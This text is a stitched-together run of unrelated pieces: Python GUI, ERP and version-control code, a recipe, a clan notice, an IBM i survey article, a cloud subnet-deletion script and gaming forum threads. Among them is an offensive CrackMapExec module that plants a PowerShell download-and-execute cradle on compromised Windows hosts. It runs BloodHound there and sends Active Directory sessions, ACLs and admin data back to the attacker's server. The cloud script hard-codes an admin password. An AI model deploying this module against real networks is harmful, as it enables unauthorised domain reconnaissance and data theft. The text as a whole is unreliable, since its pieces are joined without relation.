self.myRandrange(fuzzy_set) ); fuzzy_set = self.parent.dom_przyczepnosc.fuzzy_sets[0]; self.przyczepnosc.set( self.myRandrange(fuzzy_set) ); self.ryzyko.set(""); def onButtonWyznacz(self): try: pre = float(self.predkosc.get()); fuzzy_set = self.parent.dom_predkosc.fuzzy_sets[0]; if pre < fuzzy_set.range_min or pre > fuzzy_set.range_max: raise ValueError; except ValueError: self.debug.set('Zla wartosc predkości.'); return try: wid = float(self.widocznosc.get()); fuzzy_set = self.parent.dom_widocznosc.fuzzy_sets[0]; if wid < fuzzy_set.range_min or wid > fuzzy_set.range_max: raise ValueError; except ValueError: self.debug.set('Zla wartosc widoczności.'); return try: prz = float(self.przyczepnosc.get()); fuzzy_set = self.parent.dom_przyczepnosc.fuzzy_sets[0]; if prz < fuzzy_set.range_min or prz > fuzzy_set.range_max: raise ValueError; except ValueError: self.debug.set('Zla wartosc przyczepności.'); return self.ryzyko.set( self.parent.ruleset.inference( [pre, wid, prz ] ) ); class gui(tkinter.Tk): width=700 height=600 def __init__(self,parent,fuzzy_system): tkinter.Tk.__init__(self,parent) [dom_predkosc, dom_widocznosc, dom_przyczepnosc, dom_ryzyko, ruleset] = fuzzy_system self.dom_predkosc = dom_predkosc self.dom_widocznosc = dom_widocznosc self.dom_przyczepnosc = dom_przyczepnosc self.dom_ryzyko = dom_ryzyko self.ruleset = ruleset self.parent = parent self.guiOnButtonFPrzynaleznosci = guiOnButtonFPrzynaleznosci(self) self.guiOnButtonReguly = guiOnButtonReguly(self) self.guiOnButtonPlaszczyznaSterowan = guiOnButtonPlaszczyznaSterowan(self) self.guiOnButtonDefuzyfikacja = guiOnButtonDefuzyfikacja(self) self.guiOnButtonGeneratorLiczb = guiOnButtonGeneratorLiczb(self) self.initialize() def initialize(self): self.geometry('{}x{}'.format(self.width, self.height)) self.lf = Frame(self, bg = "light gray", width = 100, height = self.height) self.lf.pack(side=LEFT, fill=Y, padx=1, pady=1) self.initLeftFrame(self.lf) self.rf = Frame(self, bg = "light gray", width = (self.width-100), height = self.height) self.rf.pack(side=RIGHT, anchor=CENTER, expand=True, fill=BOTH, padx=3, pady=3) quote=("Program zaliczeniowy na przedmiot PSZT.\n" "\n\n\n\n\n" "Wykonali: Kamila Cipior, Kamil Cukrowski, Michał Kostrzewa\n" "Prowadząca: p. Joanna Panasiuk \n" "Rok wykonania projektu: 2016\n") l=tkinter.Label(self.rf,text=quote, justify=RIGHT, font=("Helvetica", 14)) l.pack(fill=BOTH, expand=True, anchor=CENTER) def initLeftFrame(self,lf): tkinter.Label(lf,text="\nMenu:\n\n-- Funkcje przynależności --").pack(fill=X) tkinter.Button(lf,text="prędkość", command= lambda: self.onButtonFPrzynaleznosci(self.dom_predkosc)).pack(fill=X) tkinter.Button(lf,text="widoczność", command= lambda: self.onButtonFPrzynaleznosci(self.dom_widocznosc)).pack(fill=X) tkinter.Button(lf,text="przyczepność", command= lambda: self.onButtonFPrzynaleznosci(self.dom_przyczepnosc)).pack(fill=X) tkinter.Button(lf,text="ryzyko", command= lambda: self.onButtonFPrzynaleznosci(self.dom_ryzyko)).pack(fill=X) tkinter.Label(lf,text="\n").pack(fill=X) tkinter.Label(lf,text="-- Reguły --").pack(fill=X) tkinter.Button(lf,text="Wyświetl", command=self.OnButtonReguly).pack(fill=X) tkinter.Button(lf,text="Defuzyfikacja", command=self.OnButtonDefuzyfikacja).pack(fill=X) tkinter.Label(lf,text="\n").pack(fill=X) tkinter.Label(lf,text="-- Wyostrzanie --").pack(fill=X) tkinter.Button(lf,text="Wyostrzanie liczb", command=self.OnButtonGeneratorLiczb).pack(fill=X) tkinter.Button(lf,text="Wykres 3D", command=self.OnButtonPlaszczyznaSterowan).pack(fill=X) tkinter.Label(lf,text="\n").pack(fill=X) def OnButtonDefuzyfikacja(self): self.resetFrame(self.rf) self.guiOnButtonDefuzyfikacja.show(self.rf) def OnButtonPlaszczyznaSterowan(self): self.resetFrame(self.rf) self.guiOnButtonPlaszczyznaSterowan.show(self.rf) def resetFrame(self,frame): for widget in frame.winfo_children(): widget.destroy() def OnButtonReguly(self): self.resetFrame(self.rf) self.guiOnButtonReguly.show(self.rf) def onButtonFPrzynaleznosci(self,dom): self.resetFrame(self.rf) self.guiOnButtonFPrzynaleznosci.show(self.rf, dom) def on_resize(self,event): self.resetFrame(self.rf) def OnButtonGeneratorLiczb(self): self.resetFrame(self.rf) self.guiOnButtonGeneratorLiczb.show(self.rf)
Well, I have been experimenting in the kitchen again and discovered this blissful strawberry dish with Paleo whipped cream. Strawberries are fairly low in sugar and when it is combined with the fat from the coconut it produces a recipe that will have minimal negative impact on blood sugar, adrenals, neurotransmitters and insulin, which makes it a great occasional treat for those overcoming sugar addiction, candida overgrowth, adrenal fatigue, depression, anxiety or any other neurotransmitter or autonomic nervous system condition, as well as being friendly for not promoting insulin resistance or type 2 diabetes. Put a can of coconut milk in the fridge at least overnight, but longer is better. I give it several days. Chill a stainless steel bowl in the freezer for a half hour. Take can of coconut milk out of fridge. Do not shake the can because you do not want to mix the fat back in with the liquid. You will see that the fat has risen to the top when you open it. Scoop the fat out and leave the liquid in the can. Mix with mixer for about 2 or 3 minutes. Until it looks like whipped cream. Stir in vanilla and stevia with a fork or mix again for another 30 seconds or so. If you use fresh strawberries, stick them in the freezer for a half hour to chill them prior to making whipped cream. If you use frozen strawberries, then let them thaw until soft, but still cold. Place whipped cream on top of strawberries and nuts. This recipe could be done with blueberries, or any other fruit you like. I tried blueberries as well, but I liked the strawberries best. I was amazed at how delicious, creamy and similar the coconut cream is to dairy. You can see in the image below that it looks just like real whipped cream. This dish is a very satiating dessert. If you are having a craving for a carb it will really hit the spot. Believe me, you will not walk away from the dinner table feeling the least bit hungry. Of course, you can serve the Paleo Whipped Cream on any other dish that calls for whipped cream. *My idea to whip coconut into a cream was spurred from a recipe I found at www.againstthegrain.com and from the Paleo Diet Cookbook, but I added the vanilla and stevia. What brand of Stevia do you recommend? Looks great – can’t wait to try. Thanks so much for posting and all you do! You’re welcome, Loretta. I use NOW organic stevia powder.
from cme.helpers.powershell import * from cme.helpers.misc import validate_ntlm from cme.helpers.logger import write_log from sys import exit class CMEModule: ''' Executes the BloodHound recon script on the target and retreives the results onto the attackers' machine 2 supported modes : CSV : exports data into CSVs on the target file system before retreiving them (NOT opsec safe) Neo4j API : exports data directly to the Neo4j API (opsec safe) Module by Waffle-Wrath Bloodhound.ps1 script base : https://github.com/BloodHoundAD/BloodHound ''' name = 'bloodhound' description = 'Executes the BloodHound recon script on the target and retreives the results to the attackers\' machine' supported_protocols = ['smb'] opsec_safe= False multiple_hosts = False def options(self, context, module_options): ''' THREADS Max numbers of threads to execute on target (defaults to 20) COLLECTIONMETHOD Method used by BloodHound ingestor to collect data (defaults to 'Default') CSVPATH (optional) Path where csv files will be written on target (defaults to C:\) NEO4JURI (optional) URI for direct Neo4j ingestion (defaults to blank) NEO4JUSER (optional) Username for direct Neo4j ingestion NEO4JPASS (optional) Pass for direct Neo4j ingestion Give NEO4J options to perform direct Neo4j ingestion (no CSVs on target) ''' self.threads = 3 self.csv_path = 'C:\\' self.collection_method = 'Default' self.neo4j_URI = "" self.neo4j_user = "" self.neo4j_pass = "" if module_options and 'THREADS' in module_options: self.threads = module_options['THREADS'] if module_options and 'CSVPATH' in module_options: self.csv_path = module_options['CSVPATH'] if module_options and 'COLLECTIONMETHOD' in module_options: self.collection_method = module_options['COLLECTIONMETHOD'] if module_options and 'NEO4JURI' in module_options: self.neo4j_URI = module_options['NEO4JURI'] if module_options and 'NEO4JUSER' in module_options: self.neo4j_user = module_options['NEO4JUSER'] if module_options and 'NEO4JPASS' in module_options: self.neo4j_pass = module_options['NEO4JPASS'] if self.neo4j_URI != "" and self.neo4j_user != "" and self.neo4j_pass != "" : self.opsec_safe= True self.ps_script = obfs_ps_script('BloodHound-modified.ps1') def on_admin_login(self, context, connection): if self.neo4j_URI == "" and self.neo4j_user == "" and self.neo4j_pass == "" : command = "Invoke-BloodHound -CSVFolder '{}' -Throttle '{}' -CollectionMethod '{}'".format(self.csv_path, self.threads, self.collection_method) else : command = 'Invoke-BloodHound -URI {} -UserPass "{}:{}" -Throttle {} -CollectionMethod {}'.format(self.neo4j_URI, self.neo4j_user, self.neo4j_pass, self.threads, self.collection_method) launcher = gen_ps_iex_cradle(context, 'BloodHound-modified.ps1', command) connection.ps_execute(launcher) context.log.success('Executed launcher') def on_request(self, context, request): if 'BloodHound-modified.ps1' == request.path[1:]: request.send_response(200) request.end_headers() request.wfile.write(self.ps_script.encode()) context.log.success('Executing payload... this can take a few minutes...') else: request.send_response(404) request.end_headers() def on_response(self, context, response): response.send_response(200) response.end_headers() length = int(response.headers.get('content-length')) data = response.rfile.read(length).decode() response.stop_tracking_host() if self.neo4j_URI == "" and self.neo4j_user == "" and self.neo4j_pass == "" : self.parse_ouput(data, context, response) context.log.success("Successfully retreived data") def parse_ouput(self, data, context, response): ''' Parse the output from Invoke-BloodHound ''' parsedData = data.split("!-!") nameList = ['user_sessions', 'group_membership.csv', 'acls.csv', 'local_admins.csv', 'trusts.csv'] for x in range(0, len(parsedData)): if "ComputerName" in parsedData[x] and "UserName" in parsedData[x] : log_name = '{}-{}-{}.csv'.format(nameList[0], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name)) elif "GroupName" in parsedData[x] and "AccountName" in parsedData[x] : log_name = '{}-{}-{}.csv'.format(nameList[1], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name)) elif "ComputerName" in parsedData[x] and "AccountName" in parsedData[x] : log_name = '{}-{}-{}.csv'.format(nameList[3], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name)) elif "SourceDomain" in parsedData[x] and "TrustType" in parsedData[x] : log_name = '{}-{}-{}.csv'.format(nameList[4], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name)) elif "ObjectName" in parsedData[x] and "ObjectType" in parsedData[x] : log_name = '{}-{}-{}.csv'.format(nameList[2], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name))
The Dixon Clan were represented at the Clans of Ireland AGM at the Mansion House in Dublin in April 2013 by Ceann Fine Donal Dixon of Castleknock. This clan organisation trace its pedigree back to Edward Dixon of Meath who was born in 1516. Through marriage the Dixons of Meath are also related to the Barons Louth, Barons of Galtrim and Earls of Fingal. One of the family’s ancestors, the Rt. Hon. Francis Agard, is buried alongside his daughter Lady Cecily Harrington, at Christchurch Cathedral in Dublin. The family are also related by marriage to the Hussey family, Barons of Galtrim, who came to Ireland with Strongbow in the reign of Henry II. The Dixon Clan are in the process of writing up their rich history and pedigrees before officially launching the website. They are also in the process of joining the Dixon DNA project. The Dixons are a sept of Clan Keith in Scotland. The Current Chief of Clan Keith is James William Falconer Keith, 14th Earl of Kintore.
# -*- encoding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (http://tiny.be). All Rights Reserved # # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see http://www.gnu.org/licenses/. # ############################################################################## from osv import osv from osv import fields # ### HEREDO LA PRODUCTOS PARA AÑADIRLE CAMPOS NUEVOS # class product_category(osv.osv): _name = 'product.category' _inherit = 'product.category' _columns = {'provision_type': fields.selection([('product','Stockable Product'),('consu', 'Consumable'),('service','Service')], 'Product Type', required=True, help="Will change the way procurements are processed. Consumable are product where you don't manage stock."), 'procure_method': fields.selection([('make_to_stock','Make to Stock'),('make_to_order','Make to Order')], 'Procurement Method', required=True, help="'Make to Stock': When needed, take from the stock or wait until re-supplying. 'Make to Order': When needed, purchase or produce for the procurement request."), 'supply_method': fields.selection([('produce','Produce'),('buy','Buy')], 'Supply method', required=True, help="Produce will generate production order or tasks, according to the product type. Buy will trigger purchase orders when requested."), } product_category()
way down to self-installation marquees for schools or club’s on a tight budget. Give us a call today to discuss your requirements for your upcoming event, our team will have a solution for you. *Discounts apply for large order quantities, contact us today!
import subprocess import os import polib import copy import codecs def prereleaser_middle(data): """ 1. Run the unit tests one last time before we make a release. 2. Update the CONTRIBUTORS.txt file. Note: Install polib (https://pypi.python.org/pypi/polib). """ print('Running unit tests.') subprocess.check_output(["python", "example_project/manage.py", "test", "photologue"]) print('Running PEP8 check.') # See setup.cfg for configuration options. subprocess.check_output(["pep8"]) print('Updating CONTRIBUTORS.txt') # This command will get the author of every commit. output = subprocess.check_output(["git", "log", "--format='%aN'"]) # Convert to a list. contributors_list = [unicode(contributor.strip("'"), 'utf-8') for contributor in output.split("\n")] # Now add info from the translator files. This is incomplete, we can only list # the 'last contributor' to each translation. for language in os.listdir('photologue/locale/'): filename = 'photologue/locale/{0}/LC_MESSAGES/django.po'.format(language) po = polib.pofile(filename) last_translator = po.metadata['Last-Translator'] contributors_list.append(last_translator[:last_translator.find('<') - 1]) # Now we want to only show each contributor once, and to list them by how many # contributions they have made - a rough guide to the effort they have put in. contributors_dict = {} for author in contributors_list: author_copy = copy.copy(author) if author_copy in ('', '(no author)', 'FULL NAME'): # Skip bad data. continue # The creator of this project should always appear first in the list - so # don't add him to this list, but hard-code his name. if author_copy in ('Justin Driscoll', 'justin.driscoll'): continue # Handle contributors who appear under multiple names. if author_copy == 'richardbarran': author_copy = 'Richard Barran' if author_copy in contributors_dict: contributors_dict[author_copy] += 1 else: contributors_dict[author_copy] = 1 with codecs.open('CONTRIBUTORS.txt', 'w', encoding='utf8') as f: f.write('Photologue is made possible by all the people who have contributed' ' to it. A non-exhaustive list follows:\n\n') f.write('Justin Driscoll\n') for i in sorted(contributors_dict, key=contributors_dict.get, reverse=True): f.write(i + '\n')
I was quite happy with the beat I made for last week's track and didn't feel like I was quite done with it yet, so I pinched it for this week's track and modified the pattern a little bit. The bass is 3 Massive synths layered over each other. The annoying melodic synth is Massive too. I must say I am quite partial to slidey mono synths. The pad sound is my Gaia. Quite jolly fun beat here! And what about that name? It feels a bit like a deconstructed version. It is deconstructed in that there's not much construction to it, I think! [quote=laguna]Quite jolly fun beat here! The chilly pad was lovely And what about that name? :)[/quote] ;) [quote=Devieus]It feels a bit like a deconstructed version.[/quote] It is deconstructed in that there's not much construction to it, I think! [quote=Jim Wood]Well, it's my type. Happiness slithers in with the lead synth. ::)[/quote] Heh thanks fam! Late listen. This is perfect for a workout session.
#!/usr/bin/env python # -*- encoding: utf-8 -*- # Copyright (C) 2007-2009 Guillermo Gonzalez # # The code taken from bzrlib is under: Copyright (C) 2005-2007 Canonical Ltd # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA # # Contributors: # Martin Albisetti """This code is a modified copy from bzrlib.info (see there for copyrights and licensing) """ __all__ = ['show_bzrdir_info_xml'] from bzrlib import info from bzrlib.lazy_import import lazy_import lazy_import(globals(), """ import os, sys, time from bzrlib import ( bzrdir, diff, errors, osutils, urlutils, missing, ) """) from bzrlib.errors import (NoWorkingTree, NotBranchError, NoRepositoryPresent, NotLocalUrl) def get_lines_xml(self): """Returns the locations lines as xml.""" return ["<%s>%s</%s>" % (l.replace(' ', '_'), u, l.replace(' ', '_')) \ for l, u in self.locs ] info.LocationList.get_lines_xml = get_lines_xml def show_bzrdir_info_xml(a_bzrdir, verbose=False, outfile=None): """Output to stdout the 'info' for a_bzrdir.""" if outfile is None: outfile = sys.stdout try: tree = a_bzrdir.open_workingtree( recommend_upgrade=False) except (NoWorkingTree, NotLocalUrl): tree = None try: branch = a_bzrdir.open_branch() except NotBranchError: branch = None try: repository = a_bzrdir.open_repository() except NoRepositoryPresent: # Return silently; cmd_info already returned NotBranchError # if no bzrdir could be opened. return else: lockable = repository else: repository = branch.repository lockable = branch else: branch = tree.branch repository = branch.repository lockable = tree lockable.lock_read() try: outfile.write('<?xml version="1.0"?>') outfile.write('<info>') show_component_info_xml(a_bzrdir, repository, branch, tree, verbose, outfile) outfile.write('</info>') finally: lockable.unlock() def show_component_info_xml(control, repository, branch=None, working=None, verbose=1, outfile=None): """Write info about all bzrdir components to stdout""" if outfile is None: outfile = sys.stdout if verbose is False: verbose = 1 if verbose is True: verbose = 2 layout = info.describe_layout(repository, branch, working, control) formats = info.describe_format(control, repository, branch, working).split(' or ') outfile.write('<layout>%s</layout>' % layout) outfile.write('<formats>') if len(formats) > 1: for format in formats: outfile.write('<format>%s</format>' % format) else: outfile.write('<format>%s</format>' % formats[0]) outfile.write('</formats>') _show_location_info_xml(info.gather_location_info(repository, branch, working), outfile) if branch is not None: _show_related_info_xml(branch, outfile) if verbose == 0: return _show_format_info_xml(control, repository, branch, working, outfile) _show_locking_info_xml(repository, branch, working, outfile) if branch is not None: _show_missing_revisions_branch_xml(branch, outfile) if working is not None: _show_working_stats_xml(working, outfile) elif branch is not None: _show_missing_revisions_branch_xml(branch, outfile) if branch is not None: stats = _show_branch_stats_xml(branch, verbose==2, outfile) else: stats = repository.gather_stats() if branch is None and working is None: _show_repository_info_xml(repository, outfile) _show_repository_stats_xml(stats, outfile) def _show_location_info_xml(locs, outfile): """Show known locations for working, branch and repository.""" outfile.write('<location>') path_list = info.LocationList(osutils.getcwd()) for name, loc in locs: path_list.add_url(name, loc) outfile.writelines(path_list.get_lines_xml()) outfile.write('</location>') def _show_related_info_xml(branch, outfile): """Show parent and push location of branch.""" locs = info._gather_related_branches(branch) if len(locs.locs) > 0: outfile.write('<related_branches>') outfile.writelines(locs.get_lines_xml()) outfile.write('</related_branches>') def _show_format_info_xml(control=None, repository=None, branch=None, working=None, outfile=None): """Show known formats for control, working, branch and repository.""" outfile.write('<format>') if control: outfile.write('<control>%s</control>' % control._format.get_format_description()) if working: outfile.write('<working_tree>%s</working_tree>' % working._format.get_format_description()) if branch: outfile.write('<branch>%s</branch>' % branch._format.get_format_description()) if repository: outfile.write('<repository>%s</repository>' % repository._format.get_format_description()) outfile.write('</format>') def _show_locking_info_xml(repository, branch=None, working=None, outfile=None): """Show locking status of working, branch and repository.""" if (repository.get_physical_lock_status() or (branch and branch.get_physical_lock_status()) or (working and working.get_physical_lock_status())): outfile.write('<lock_status>') if working: if working.get_physical_lock_status(): status = 'locked' else: status = 'unlocked' outfile.write('<working_tree>%s</<working_tree>' % status) if branch: if branch.get_physical_lock_status(): status = 'locked' else: status = 'unlocked' outfile.write('<branch>%s</branch>' % status) if repository: if repository.get_physical_lock_status(): status = 'locked' else: status = 'unlocked' outfile.write('<repository>%s</repository>' % status) outfile.write('</lock_status>') def _show_missing_revisions_branch_xml(branch, outfile): """Show missing master revisions in branch.""" # Try with inaccessible branch ? master = branch.get_master_branch() if master: local_extra, remote_extra = missing.find_unmerged(branch, master) if remote_extra: outfile.write('<branch_stats>') outfile.write('<missing_revisions>%d<missing_revisions>' % len(remote_extra)) outfile.write('</branch_stats>') def _show_missing_revisions_working_xml(working, outfile): """Show missing revisions in working tree.""" branch = working.branch basis = working.basis_tree() branch_revno, branch_last_revision = branch.last_revision_info() try: tree_last_id = working.get_parent_ids()[0] except IndexError: tree_last_id = None if branch_revno and tree_last_id != branch_last_revision: tree_last_revno = branch.revision_id_to_revno(tree_last_id) missing_count = branch_revno - tree_last_revno outfile.write('<missing_revisions>%d</missing_revisions>' % missing_count) def _show_working_stats_xml(working, outfile): """Show statistics about a working tree.""" basis = working.basis_tree() delta = working.changes_from(basis, want_unchanged=True) outfile.write('<working_tree_stats>') _show_missing_revisions_working_xml(working, outfile) outfile.write('<unchanged>%s</unchanged>' % len(delta.unchanged)) outfile.write('<modified>%d</modified>' % len(delta.modified)) outfile.write('<added>%d</added>' % len(delta.added)) outfile.write('<removed>%d</removed>' % len(delta.removed)) outfile.write('<renamed>%d</renamed>' % len(delta.renamed)) ignore_cnt = unknown_cnt = 0 for path in working.extras(): if working.is_ignored(path): ignore_cnt += 1 else: unknown_cnt += 1 outfile.write('<unknown>%d</unknown>' % unknown_cnt) outfile.write('<ignored>%d</ignored>' % ignore_cnt) dir_cnt = 0 for path, entry in working.iter_entries_by_dir(): if entry.kind == 'directory' and entry.parent_id is not None: dir_cnt += 1 outfile.write('<versioned_subdirectories>%d</versioned_subdirectories>' % (dir_cnt)) outfile.write('</working_tree_stats>') def _show_branch_stats_xml(branch, verbose, outfile): """Show statistics about a branch.""" revno, head = branch.last_revision_info() outfile.write('<branch_history>') outfile.write('<revisions>%d</revisions>' % (revno)) stats = branch.repository.gather_stats(head, committers=verbose) if verbose: committers = stats['committers'] outfile.write('<committers>%d</committers>' % (committers)) if revno: timestamp, timezone = stats['firstrev'] age = int((time.time() - timestamp) / 3600 / 24) outfile.write('<days_old>%d</days_old>' % (age)) outfile.write('<first_revision>%s</first_revision>' % \ osutils.format_date(timestamp, timezone)) timestamp, timezone = stats['latestrev'] outfile.write('<latest_revision>%s</latest_revision>' % \ osutils.format_date(timestamp, timezone)) outfile.write('</branch_history>') return stats def _show_repository_info_xml(repository, outfile): """Show settings of a repository.""" ## FIXME/TODO: is this needed in the xml output? #if repository.make_working_trees(): # print 'Create working tree for new branches inside the repository.' def _show_repository_stats_xml(stats, outfile): """Show statistics about a repository.""" if 'revisions' in stats or 'size' in stats: outfile.write('<repository_stats>') if 'revisions' in stats: revisions = stats['revisions'] outfile.write('<revisions>%d</revisions>' % (revisions)) if 'size' in stats: outfile.write('<size unit="KiB">%d</size>' % (stats['size']/1024)) if 'revisions' in stats or 'size' in stats: outfile.write('</repository_stats>')
IBM i shops around the country will be concentrating their efforts more on defensive IT measures like security and high availability this year, as offensive measures like application modernization and mobile app development take a back seat on corporate to-do lists, according HelpSystems’ recent marketplace study. While digital transformation is still an important topic that IBM i shops should have on their radar, an even bigger priority in 2017 will be getting one’s digital house in order before hackers, disgruntled employees, or natural disasters conspire to compromise data and disrupt operations. That message came through loud and clear in HelpSystems 2017 IBM i Marketplace Survey, which was based on surveys taken by nearly 500 IBM i professionals. But the need for better security has also been a commonly heard refrain in other conversations this year, such as the ongoing 2017 predictions that IT Jungle has been asking IBM i leaders to write about. High availability also rose in prominence, if not the standings. About 39 percent of the IBM i professionals taking HelpSystems 2016 survey reported high availability as a top concern, which was good enough for second place. While high availability remained in second place for the 2017 study, about 59 percent of respondents in the 2017 study said it was a top concern, a healthy 20 percent increase. The percentage of IBM i shops using high availability has also gone up, according to the report. Today, nearly 49 percent of IBM i shops have HA, up about 2 percent in the past year. IBM i HA provider Vision Solutions, which recently published its annual State of Resilience report, also has detected the new security thinking. The defensive shift among IBM i shops dropped application modernization from first in the 2016 survey to third in the 2017 survey. The fraction of IBM i pros saying application modernization was a top concern dropped from about 58 percent in 2016 to about 50 percent in 2017, according to the results. Mobile access, which was the third most cited top concern in 2016 with 38 percent of the vote, plummeted to 10th place in the 2017 survey, with a 24 percent share. Analytics and business intelligence–which can also be thought of as offensive measures designed to boost overall business as part of an overall digital transformation strategy–declined by less than a percent, although it moved up from 7th to 8th place in the standings. Viewed together, the increased focus on security and HA on the one hand, and the drop in modernization and mobile access on the other, makes sense, according to Tom Huntington, HelpSystems vice president of technical services and the author of the 2017 Marketplace report. The level of concern that IBM i showed about data growth itself was relatively flat. About 34 percent of IBM i shops in the 2016 study listed “data growth” as a top concern, good enough for 5th place. This year, data growth remains in 5th place, although 1.5 percent more people listed it as a concern. The growing awareness around security isn’t just an IBM i trend. The wider world seems to be waking up to the need to improve computer security. This is especially true in light of the high-profile hacks that took place during last year’s presidential campaign and the revelation from American national security agencies that the Russian government was behind some of it. According to the 2017 Thales Data Threat Report, which surveyed IT professionals about security issues, 73 percent of respondents expect to increase spending on security in the next 12 months. That’s up sharply from the prior year, when 58 percent expected increases in security spending. Data breaches are also up, according to the Thales study, which found the number of organizations reporting that their data has been breached increased from about 60 percent in 2016 to about 67 percent in the 2017 report. Increasing complexity and a lack of suitably trained staff were cited as barriers to better security. The skills issue will continue to be an important topic in IBM i circles this year, as it was for much of last year, when surveys pointed to a lack skills being a barrier to digital transformation at IBM i shops. But the skills gap is evolving, and it’s not just a lack of knowledge of RPG or Control Language that matters anymore–it’s the lack of security skills. Security is a top concern for all shops in 2017, not just IBM i shops. Will the increased focus on IBM i security issues translate into better, more securely configured systems, as measured in PowerTech’s annual State of Security study, which is due out this spring? The study measures how well security practices are followed in actual customers’ IBM i servers. You can access your own copy of the 2017 IBM i Marketplace Study at this webpage. You can also watch the panel discussion webcasts, which included IBMers Ian Jarman and Alison Butterill and IT Jungle‘s own Timothy Prickett Morgan.
#!/usr/bin/python import gcloudutils import sys import requests import argparse from infoblox_client import connector from infoblox_client import objects from requests.auth import HTTPBasicAuth from requests.packages.urllib3.exceptions import InsecureRequestWarning from oauth2client.client import GoogleCredentials from googleapiclient import discovery requests.packages.urllib3.disable_warnings(InsecureRequestWarning) credentials = GoogleCredentials.get_application_default() compute = discovery.build('compute', 'v1', credentials=credentials) parser = argparse.ArgumentParser( description='Create a number of VMs in Google Compute Engine. Google Cloud SDK must be installed and configured (gcloud init) and google-api-python-client and infoblox-client Python libraries must be installed.') parser.add_argument('name', nargs='+', help='List of FQDNs for VMs to delete separated by spaces') args=parser.parse_args() niosip = '10.60.27.4' niosuser = 'admin' niospw = 'infoblox' project='mythic-brook-146218' zone='us-west1-a' #name = args.name splitzone = zone.split('-',2) region = splitzone[0] + '-' + splitzone[1] opts = {'host': niosip, 'username': niosuser, 'password': niospw} conn = connector.Connector(opts) for name in args.name: gotnet = gcloudutils.get_subnet(compute, project, region, name) addr = gotnet['ipCidrRange'] gcloudutils.delete_subnet(compute, project, region, name) netobj = objects.Network.search(conn, cidr=addr) netdelete = objects.Network.delete(netobj)
Balgair has just been sent the official release code. Later today I will send the same code to the distribution sites. Remember this code will not work with client 7.3.5 you need to wait until you have client 8.0.1 running. Also remember do not attempt to upload data from this 8.0.0 addon until you see my announcement in the News and Announcement forums... as it may take me a few days to get the new races enabled correctly. The servers will be taken offline in Europe at 02:00 CET (which is in 16 and a half hours) for upgrade. After that time, it should be safe to make any or all changes nessesary to this site. the maintenance window was much shorter then they needed. Due to timing and real life constraints.. this site will stop accepting data (V7) about 11am (PDT) tomorrow. The site will accept Data (V shortly thereafter. The EU players should have a better time.. login failures, crashes, misplaced characters, disconnects... even possibly breaking twitter for a little. Our servers didn't even come down in the right timezone, so... not the best sign lol. Announcement said 2:00 CEST, it actually happened at 2:00 BST or CET, 1 hour late... gives me confidence! Looks like a troll, with some text over.. Not worth to release a new build for, but should be addressed when you have time.. Damn... I hadn't even read that, until you quoted it.. In any way, it's much better than the fugly question mark.. After spending all day chasing addons, I'm even more appreciative of BOYD's work on this, 50% of my addons aren't updated yet Several of those I have a bad feeling might be dead, no updates since 7.0, hopefully someone will take those over, but the lesser used ones are probably gone for good. I haven't tried the old ones yet to be fair, the simpler ones might work, but I'm getting enough errors from addons that are supposed to be updated to not want to add non-updated things into the mix yet! I still have a few addons, that haven't been updated since WOTLK, and they still work (with a few errors in bugsack).. Just took a look at the upload logs and things look ok.. except. I have noticed a small number of people who are getting E status.. and each one that I looked at (not all of them) had data files showing CensusPlus active in a census run when the character went offline. I would have to look more closely at what is causing the exact failure mode, but I do not really have the time to do that now. I expect that is due to the stability (lack thereof) of the servers at this time. When things settle down and later uploads are attempted I am sure those uploads will process without issue. Ohh yes, I have an E - odd, as I have not crashed out at any point, only logged out normally, European servers have been very stable. So unless a reload when fixing addons has done anything, I've had no unusual situations, only regular logouts. I have not experienced any instability on EU servers.. I have a single E (last I checked), and have been switching toons several times while running, and a few DCs due to 30 minutes AFK (perfectly normal). Never had any crashes or unexpected DCs.. Sorry I have not gotten the website to display the new stuff yet. I have not been feeling well the past few days, and have not done anything except watch the hours slip by. I hope to have the updates up later this week. Don't stress about it - none of it's in until BFA launches on August 14th anyway Lvl 120 comes on launch, Dark iron Dwarves/Mag'har I believe need completion of the war campaign, don't know if that's gated at all, but would imagine it'll take at least a few days; if gated, more like a few weeks. I don't know if it's going to cause a problem .. but currently there appears to be a bug with characters transferring realms. We've had a couple of people transfer over from another realm, and join us not long after the transfer went through. But then suddenly, although they were still in the guild, and could still take part in guild chat, they were no longer showing on the guild roster. And in guild chat their character names show as their previous character name-realm .. which is very weird. As far as CensusPlus is concerned... the transfer just did not happen.. when it does.. then the characters will appear as new characters in the database on the new realm. We have no way to handle realm to realm transfer tracking .. as that info is not published in game by Blizzard.
